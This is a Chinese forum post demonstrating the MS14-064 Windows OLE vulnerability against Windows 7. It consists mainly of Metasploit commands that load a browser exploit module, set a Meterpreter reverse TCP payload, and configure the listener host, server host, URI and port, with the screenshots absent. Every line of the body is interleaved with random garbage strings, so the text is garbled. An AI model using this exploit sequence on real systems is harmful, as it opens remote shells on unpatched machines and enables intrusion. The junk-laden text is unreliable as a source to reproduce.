找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2015|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' a8 X: D9 ^- P 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示0 ?+ N( P+ b# g* w* d# L l5 S0 F

. I4 J( z5 G' t; O" p8 \/ V# }

( N" e3 L6 t. B9 ^6 l5 e2 e8 s! ^ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: $ ^3 D) U! \ _) O9 K0 {

, M0 m- J) k; u6 ]6 q

- I6 `4 }- \& N5 o9 O; [ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 3 r8 t# e( p5 H# S1 |

$ ^8 P; J$ A' @) U) D7 g# g( c( c

1 T0 G+ B) e1 Z             set AllowPowershellPrompt true! ]: Y( k! E/ X3 H0 d4 T, i9 g

# }2 w, r! }/ h0 D) o: `( i z4 I$ G

5 \% N: @6 }$ B6 Y* x6 s: q$ v& F1 _             Set LHOST 192.168.0.109 $ M" ~: I' m+ y8 N# b" m4 t! y

2 P0 M' b+ |& F0 h

6 h( ^: o3 d3 b% Y+ H4 Q& C4 W% ^- T             set SRVHOST 192.168.0.109 ( n9 b O4 a: O7 X8 N' W

$ m2 S- t* t" K7 @! U' S9 [/ D4 ?

; ~8 e; X7 S: w3 A             Set uripath share & M; b% j% Y) `3 a

# O/ i) z; m1 }1 r1 }2 ` y

/ }# E( A1 e3 f) G, g! T) \8 n$ @+ @" F' P             Set srvport 80 & ?0 Y8 ?$ x: g4 m3 i/ V7 R: z4 r

, h6 P' f$ b8 X* y! j/ Z7 p @

1 p, }) E6 n' o& o: ?/ ?( W, h  2 }6 g; e* E/ @! [; \5 b3 B

! A7 R9 D# x9 |/ X+ M

- u0 p$ h5 x% R  - ^" i3 O/ s6 M" T3 B) P6 f

8 V& w7 f1 [3 D L/ S5 S( K

! q; k: g. x+ p* y  . j& b6 l7 _4 S

7 {$ r9 t: Z7 p% a8 \- P s: @

^0 L0 X4 v) Z) S  . D7 L$ ?6 X3 l9 w( U( L3 M5 c

7 C# f* u3 [' W p' I. Y& q

) I( ]! j0 @( o  7 k0 C4 c: L5 B' A7 d% `' l

! n4 t! x3 n' t0 m

. F$ ]3 ^" m/ P3 l6 ^1 Q/ W 下面我们来访问本地地址如图:. D. \1 i) V+ `5 v4 s

1 q3 n# O- S" V

% p0 \1 y; c8 @ D7 r8 l) a+ @% W  5 l1 {& _; G+ ?3 _$ a* k

+ e3 M7 r* b8 l4 F; F% [: i( X2 u+ R: g

* R1 x) M2 {1 H2 r: k   8 c7 G" n. {! X9 \7 w& e# M( `

) t. X' j3 y3 H; _0 y1 g

5 r y4 p6 K. n5 l/ S3 j 4 a: T2 L2 n. Z6 } O2 T2 K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表